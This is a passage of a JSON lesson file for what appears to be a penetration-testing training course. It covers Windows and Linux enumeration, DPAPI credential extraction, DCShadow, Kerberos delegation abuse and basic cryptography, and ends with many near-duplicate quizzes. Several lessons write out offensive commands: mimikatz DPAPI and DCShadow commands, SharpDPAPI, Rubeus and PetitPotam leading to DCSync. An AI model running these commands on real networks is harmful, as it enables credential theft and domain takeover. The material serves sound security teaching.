Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-win-enum","cat":"Post-Exploitation","title":"Windows Enumeration","diff":1,"xp":100,"intro":"Systematically enumerate after getting access.","sections":[{"type":"text","content":"whoami, systeminfo, net user, netstat, tasklist."},{"type":"code","lang":"bash","content":"whoami /all\nsysteminfo\nnet user\nnet localgroup administrators\nnetstat -ano"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"First command on Windows should be...","opts":["del *","whoami /all","shutdown","format C:"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-linux-enum","cat":"Post-Exploitation","title":"Linux Enumeration","diff":1,"xp":100,"intro":"Systematic Linux enumeration after shell access.","sections":[{"type":"text","content":"id, uname, sudo -l, SUID binaries, cron jobs."},{"type":"code","lang":"bash","content":"id && whoami\nuname -a\nsudo -l\nfind / -perm -4000 2>/dev/null"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Commands you can run as root","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-dpapi","cat":"Post-Exploitation","title":"DPAPI Credential Extraction","diff":4,"xp":250,"intro":"Decrypt Windows DPAPI-protected secrets.","sections":[{"type":"text","content":"With user's password, decrypt Chrome passwords, WiFi keys, RDP creds."},{"type":"code","lang":"bash","content":"mimikatz# dpapi::masterkey /in:MASTERKEY /rpc\nSharpDPAPI.exe triage"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DPAPI uses...","opts":["Global key","User's password-derived master key","No encryption","TPM only"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-dcshadow","cat":"Post-Exploitation","title":"DCShadow Attack","diff":5,"xp":300,"intro":"Register a rogue DC to push AD changes.","sections":[{"type":"text","content":"Changes appear as normal DC replication in logs."},{"type":"code","lang":"bash","content":"mimikatz# lsadump::dcshadow /object:user /attribute:primaryGroupID /value:512\nmimikatz# lsadump::dcshadow /push"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCShadow is stealthy because...","opts":["Encryption","Changes look like normal DC replication","It's fast","No credentials needed"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-delegation","cat":"Post-Exploitation","title":"Kerberos Delegation Chain","diff":5,"xp":300,"intro":"Chain delegation types for cross-domain escalation.","sections":[{"type":"text","content":"Unconstrained captures TGTs, constrained impersonates users, RBCD configures trust."},{"type":"code","lang":"bash","content":"Rubeus.exe monitor /interval:5\npython3 PetitPotam.py compromised_host DC\n# Capture DC TGT -> DCSync"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Unconstrained delegation captures...","opts":["Passwords","TGTs from any authenticating user","File shares","Network traffic"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cr-stream","cat":"Cryptography","title":"Stream Cipher Basics","diff":1,"xp":75,"intro":"Encrypt byte-by-byte with a keystream.","sections":[{"type":"text","content":"Stream ciphers XOR plaintext with pseudorandom keystream. Key reuse is fatal."},{"type":"code","lang":"bash","content":"# RC4 (legacy), ChaCha20 (modern)\n# Never reuse key+nonce!\n# C1 XOR C2 = P1 XOR P2 if same key"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decryption","XORing ciphertexts to recover plaintexts","Key recovery","Nothing"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-block-modes","cat":"Cryptography","title":"Block Cipher Modes","diff":1,"xp":100,"intro":"ECB, CBC, CTR, GCM compared.","sections":[{"type":"text","content":"ECB leaks patterns, CBC chains blocks, CTR parallelizes, GCM authenticates."},{"type":"code","lang":"bash","content":"# ECB: identical blocks = identical ciphertext\n# CBC: XOR with previous block\n# CTR: encrypt counter, XOR with plaintext\n# GCM: CTR + authentication"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Which mode provides encryption AND authentication?","opts":["ECB","CBC","CTR","GCM"],"ans":3},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-collision","cat":"Cryptography","title":"Hash Collision Attacks","diff":3,"xp":200,"intro":"Find two inputs with the same hash.","sections":[{"type":"text","content":"MD5 collisions generated in seconds. SHA-1 proven (SHAttered). Enables cert forgery."},{"type":"code","lang":"bash","content":"# MD5 collision\nhashclash -o col1.bin col2.bin\nmd5sum col1.bin col2.bin  # same hash, different files"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"An MD5 collision means...","opts":["MD5 is fast","Two different inputs produce the same hash","MD5 uses 256 bits","MD5 is reversible"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 